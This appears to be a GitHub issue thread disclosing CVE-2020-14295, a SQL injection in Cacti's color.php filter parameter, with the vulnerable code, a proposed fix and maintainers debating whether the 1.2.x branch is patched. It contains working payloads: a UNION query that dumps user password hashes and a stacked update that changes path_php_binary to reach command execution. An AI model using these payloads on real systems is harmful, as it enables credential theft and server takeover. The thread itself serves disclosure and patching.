There is an sql injection on the latest version (in the /cacti/color.php page on the parameter filter.
Steps to reproduce the behavior:
call /cacti/color.php?action=export&header=false&filter=')<SQLI HERE>--+-

change the following lines :
https://github.com/Cacti/cacti/blob/f27e609cadfd7bd5018769f507ee062de49a5e8a/color.php#L754
/* form the 'where' clause for our main sql query */
if (get_request_var('filter') != '') {
$sql_where = "WHERE (name LIKE '%" . get_request_var('filter') . "%'
OR hex LIKE '%" . get_request_var('filter') . "%')";
} else {
$sql_where = '';
}
You should do db_qstr('%' . get_request_var('filter') . '%') instead of '%" . get_request_var('filter') . "%.
GET /cacti/color.php?action=export&header=false&filter=1')+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;update+settings+set+value='touch+/tmp/sqli_from_rce;'+where+name='path_php_binary';--+-
host.php?action=reindex and get the shell_exec called with the path_php_binary.
cve-id: CVE-2020-14295
Not sure if that was already covered in our current CVE tracker. Have you tested against the very latest 1.2.x branch ?
I tried with that image which use the latest release : quantumobject/docker-cacti
And the request :
/cacti/color.php?action=export&header=false&filter=')+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;-- -`
Is getting back the users and hash.
The code on this function haven't change in 3 years:

But the filter change 11 months ago and that change bring the issue.


This was resolved some time ago in the 1.2.x branch.
This was resolved some time ago in the 1.2.x branch.
Would you have a commit reference int the 1.2.x branch which is fixing the issue?
No this is NOT fixed.
I just tried with a fresh checkout of 1.2.x. and the exploit still work.
Please reopen @TheWitness
Thanks for verifying. And supplying a patch. Could you add the CVE number to the changelog ?
You have to be reviewing something other than the 1.2.x branch. Here is a screen capture of the 1.2.x branch. Tell me which part of this does not conform to your reasoning?

@Mayfly277, after re-reading, I think you are confused. It's "git clone -b 1.2.x ...". It's not "branch 1.12.x, it's 1.2.x.
@TheWitness please retake a Look line 754 ;).

I'll be damned. Where did that come from. Re-opening. Thanks for being persistent.
Resolved now.
From Code: color.php always process filter by function sanitize_search_string.
And sanitize_search_string will drop char ',, ; and )`.
Why your env can get SQL result.
In my test, final SQL like SQL below, all invalid char is dropped, and injection SQL around with single quot:
SELECT *,
SUM(CASE WHEN local_graph_id>0 THEN 1 ELSE 0 END) AS graphs,
SUM(CASE WHEN local_graph_id=0 THEN 1 ELSE 0 END) AS templates
FROM (
SELECT c.*, local_graph_id
FROM colors AS c LEFT JOIN (
SELECT color_id, graph_template_id, local_graph_id FROM graph_templates_item WHERE color_id>0
) AS gti ON c.id=gti.color_id
) AS rs
WHERE (name LIKE '%1 UNION SELECT 1 username password 4 5 6 7 from user_auth %'
OR hex LIKE '%1 UNION SELECT 1 username password 4 5 6 7 from user_auth %')
AND read_only='on'
GROUP BY rs.id